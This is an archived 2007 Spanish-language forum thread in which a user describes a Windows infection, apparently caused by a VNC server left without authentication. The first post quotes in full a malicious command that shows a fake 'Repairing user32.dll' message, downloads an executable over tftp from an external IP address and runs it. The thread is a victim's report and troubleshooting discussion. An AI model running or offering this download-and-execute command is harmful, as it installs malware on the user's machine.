Iniciar sesión

Ver la versión completa : Ataque raro a Win



otto_xd
22/06/2007, 23:32
Buenas, hoy he sufrido lo que creo que es un ataque o una extraña infeccion bajo windows(tanto usar linux puede haberme creado lafalsa senacion de que siempre estare seguro).

He salido de la uni con un compañero y nos hemos puesto ha jugar a la gc bajo DSCALER, y de repente todo ha empezado a hacer cosas extrañas, como si estubieran intentando cerrar la ventana del programa...

Como me olia algo raro he quitado el cable de red del router y he revisado conexiones, pero no aparecia nada, hasta que le he dado a ejecutar y me he encontrado con esta linea tan bonita :


%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 70.253.45.200 GET fkosqkcj.ex_ & start fkosqkcj&

He quitado la extension para que nadie pueda ejecutarlo desde ejecutar bajo win.

Bueno, he buscado el archivo en win y lo he encontrado, junto con un archivo pf(de esos que dicen que cargar y que no cargar al arranque de win
), de forma que pienso que estoy infectadisimo.

Antivir no me lo reconoce como virus, de hecho no me lo reconoce como nada, pero que el archivo este cargado varias veces en memoria, ademas de tener replicas en cuanto a tamaño de memoria con otros nombres no me deja duda, tengo un virus.

Como el pc lo uso para muchas cosas, pero no tengo nada que no se pueda borrar, asi que terminare por reinstalar win, pero me jode no poder tomar represalias contra el tio que ha hecho esto, ya que mi pc solo lo uso yo, y win lo pongo cada muucho tiempo, y no he ejecutado nada raro, ni parches de juegos)tengo juegos de steam originales ni nada rado.

Donde puedo repotar este virus??Que me recomendais que haga??Como puedo haberme infectado??

Saludos y gracias

neglox
23/06/2007, 01:00
Mas que virus, parece un troyano para usar tu máquina como "spameadora" o quien sabe que otros maléficos intereses. Normalmente los tftp los suelen usar aplicaciones de este tipo, como es el caso para bajarse algún programa más grande.

Yo creo que puedes solucionarlo sin tener que reinstalar windows, no se quizás un firewall restrictivo sea la solución.

otto_xd
23/06/2007, 11:56
Bueno, despues de investigar parece que hay ese tipo de ataques a mucha gente que usa VNC servers...

Creo que tengo instalado un cliente en win, que no un server, o si lo tengo, esta con contraseña, asi que puede que sea una vulnerabilidad del vncreal...

Ademas, mi router tiene un firewall que cierra todo el trafico que no tengo permitido, y he revisado las tablas del nat que he creado y no tengo puesto ninguna regla para darle salida al vnc, raro raro raro...

Saludos y andaros con ojo.

^MiSaTo^
23/06/2007, 14:01
Yo empecé a sufrir ataques por el vnc del Ubuntu, pero como tengo puesto que pida confirmacion y contraseña y demás... pero si me saltaba lo de: "no se que ip esta intentando usar el vnc"

otto_xd
24/06/2007, 12:11
Ya he dado con el problema!!

No se en que momento instale vnc real server, juraria que solo instale el vnc client, pero lo peor es que por defecto estaba que no pidiese autentificacion!! :S

No se de donde me lo baje, pero dudo que en la descarga de la pagina principal pongan algo que deja las puertas de tu pc habiertas :S

Ahora mismo he puesto el firewall de windows y me estoy bajando avast, que no hace mucho, pero algo es algo...(y lo bien que vivo bajo ubuntu, sin privilegios para que pasen estas cosas...)

Saludos